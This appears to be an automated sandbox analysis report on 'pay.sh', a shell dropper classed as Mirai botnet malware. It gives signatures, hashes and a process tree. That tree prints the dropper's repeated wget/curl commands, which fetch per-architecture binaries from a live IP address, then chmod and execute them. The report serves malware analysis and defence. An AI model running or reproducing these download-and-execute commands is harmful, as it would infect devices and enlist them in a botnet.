Overview

overview

10

Static

static

1

pay.sh

ubuntu-18.04-amd64

10

pay.sh

debian-9-armhf

10

pay.sh

debian-9-mips

10

pay.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    51s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    13-12-2024 12:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pay.sh

  • Size

    2KB

  • MD5

    624b68623e669355734d1149ffd5d430

  • SHA1

    ce07fb83638c8fa2865aa2b3d007c35902f7d96a

  • SHA256

    2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc

  • SHA512

    143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Score
10/10
miraiunstbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

UNST

Extracted

Family

mirai

Botnet

UNST

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (65894) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 54 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Writes file to tmp directory
    PID:708
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:734
    • /bin/cat
      cat b3astmode.x86
      2⤵
        PID:737
      • /bin/chmod
        chmod +x B3ASTM0DE b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
        2⤵
        • File and Directory Permissions Modification
        PID:738
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        PID:739
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:741
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:742
      • /bin/cat
        cat b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        PID:743
      • /bin/chmod
        chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
        2⤵
        • File and Directory Permissions Modification
        PID:744
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:745
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Writes file to tmp directory
        PID:749
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:755
      • /bin/cat
        cat b3astmode.mpsl
        2⤵
          PID:769
        • /bin/chmod
          chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
          2⤵
          • File and Directory Permissions Modification
          PID:770
        • /tmp/B3ASTM0DE
          ./B3ASTM0DE
          2⤵
          • Executes dropped EXE
          PID:772
        • /usr/bin/wget
          wget http://15.228.54.104/beastmode/b3astmode.arm4
          2⤵
            PID:774
          • /usr/bin/curl
            curl -O http://15.228.54.104/beastmode/b3astmode.arm4
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:785
          • /bin/cat
            cat b3astmode.arm4
            2⤵
              PID:794
            • /bin/chmod
              chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
              2⤵
              • File and Directory Permissions Modification
              PID:796
            • /tmp/B3ASTM0DE
              ./B3ASTM0DE
              2⤵
              • Executes dropped EXE
              PID:797
            • /usr/bin/wget
              wget http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Writes file to tmp directory
              PID:801
            • /usr/bin/curl
              curl -O http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:815
            • /bin/cat
              cat b3astmode.arm5
              2⤵
                PID:816
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
                2⤵
                • File and Directory Permissions Modification
                PID:817
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                PID:818
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Writes file to tmp directory
                PID:820
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Reads runtime system information
                • Writes file to tmp directory
                PID:821
              • /bin/cat
                cat b3astmode.arm6
                2⤵
                  PID:826
                • /bin/chmod
                  chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
                  2⤵
                  • File and Directory Permissions Modification
                  PID:827
                • /tmp/B3ASTM0DE
                  ./B3ASTM0DE
                  2⤵
                  • Executes dropped EXE
                  PID:828
                • /usr/bin/wget
                  wget http://15.228.54.104/beastmode/b3astmode.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:832
                • /usr/bin/curl
                  curl -O http://15.228.54.104/beastmode/b3astmode.arm7
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:845
                • /bin/cat
                  cat b3astmode.arm7
                  2⤵
                    PID:858
                  • /bin/chmod
                    chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
                    2⤵
                    • File and Directory Permissions Modification
                    PID:859
                  • /tmp/B3ASTM0DE
                    ./B3ASTM0DE
                    2⤵
                    • Executes dropped EXE
                    PID:860
                  • /usr/bin/wget
                    wget http://15.228.54.104/beastmode/b3astmode.ppc
                    2⤵
                    • Writes file to tmp directory
                    PID:862
                  • /usr/bin/curl
                    curl -O http://15.228.54.104/beastmode/b3astmode.ppc
                    2⤵
                    • Reads runtime system information
                    • Writes file to tmp directory
                    PID:863
                  • /bin/cat
                    cat b3astmode.ppc
                    2⤵
                      PID:864
                    • /bin/chmod
                      chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh systemd-private-1bbdc8b1947a45ba8ddba5cfc9f73935-systemd-timedated.service-Xf9y0M
                      2⤵
                      • File and Directory Permissions Modification
                      PID:865
                    • /tmp/B3ASTM0DE
                      ./B3ASTM0DE
                      2⤵
                      • Executes dropped EXE
                      PID:866
                    • /usr/bin/wget
                      wget http://15.228.54.104/beastmode/b3astmode.m68k
                      2⤵
                      • Writes file to tmp directory
                      PID:868
                    • /usr/bin/curl
                      curl -O http://15.228.54.104/beastmode/b3astmode.m68k
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:872
                    • /bin/cat
                      cat b3astmode.m68k
                      2⤵
                        PID:873
                      • /bin/chmod
                        chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
                        2⤵
                        • File and Directory Permissions Modification
                        PID:874
                      • /tmp/B3ASTM0DE
                        ./B3ASTM0DE
                        2⤵
                        • Executes dropped EXE
                        PID:875
                      • /usr/bin/wget
                        wget http://15.228.54.104/beastmode/b3astmode.sh4
                        2⤵
                        • Writes file to tmp directory
                        PID:877
                      • /usr/bin/curl
                        curl -O http://15.228.54.104/beastmode/b3astmode.sh4
                        2⤵
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:878
                      • /bin/cat
                        cat b3astmode.sh4
                        2⤵
                          PID:879
                        • /bin/chmod
                          chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x86 pay.sh
                          2⤵
                          • File and Directory Permissions Modification
                          PID:880
                        • /tmp/B3ASTM0DE
                          ./B3ASTM0DE
                          2⤵
                          • Executes dropped EXE
                          PID:881

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/B3ASTM0DE
                        Filesize

                        23KB

                        MD5

                        6fdcdf8e1a1d76e45fa874a20a18b804

                        SHA1

                        8f8253e997ac2997a16e3a189f441d30d9a7675c

                        SHA256

                        f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057

                        SHA512

                        d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

                        Download Submit

                      • /tmp/B3ASTM0DE
                        Filesize

                        24KB

                        MD5

                        8e2bc890571386d49be504c19d6ae5f4

                        SHA1

                        ec10343c39481e9867cab49607feb8351baa17dd

                        SHA256

                        e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2

                        SHA512

                        75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

                        Download Submit

                      • /tmp/B3ASTM0DE
                        Filesize

                        275B

                        MD5

                        8a052866f3090135b18f374ce1049566

                        SHA1

                        cc858d4367e62558a09416f9521c159ec02ce42f

                        SHA256

                        efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120

                        SHA512

                        0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

                        Download Submit

                      • /tmp/B3ASTM0DE
                        Filesize

                        49KB

                        MD5

                        d585800f95f4f716d9faf633ebaa9433

                        SHA1

                        ddf0a2bf2db94565ff0195178c35464c461bba26

                        SHA256

                        ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558

                        SHA512

                        af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122

                        Download Submit

                      • /tmp/B3ASTM0DE
                        Filesize

                        50KB

                        MD5

                        1eb79986e143c1056ba849622066314a

                        SHA1

                        8e3f6732545066ea8437a0fea031ac48d3fb91ac

                        SHA256

                        584deb400df62226321615bf2e15538cd3483d0effea114df211395f7d4e3e49

                        SHA512

                        57c1ee3f81f78d767163d1834d061e36bdf3f8fbd359c73522e5e51c8887a92b2a12c65636cdc49e2974246e24bd944030d6d91083776f62e53018dacf850d3e

                        Download Submit

                      • /tmp/b3astmode.x86
                        Filesize

                        22KB

                        MD5

                        873c6ba01596fdbb9c469fe1e0180243

                        SHA1

                        9236be2f17ba4d7422bf8f579d95c6226d3eaa48

                        SHA256

                        9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170

                        SHA512

                        f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee

                        Download Submit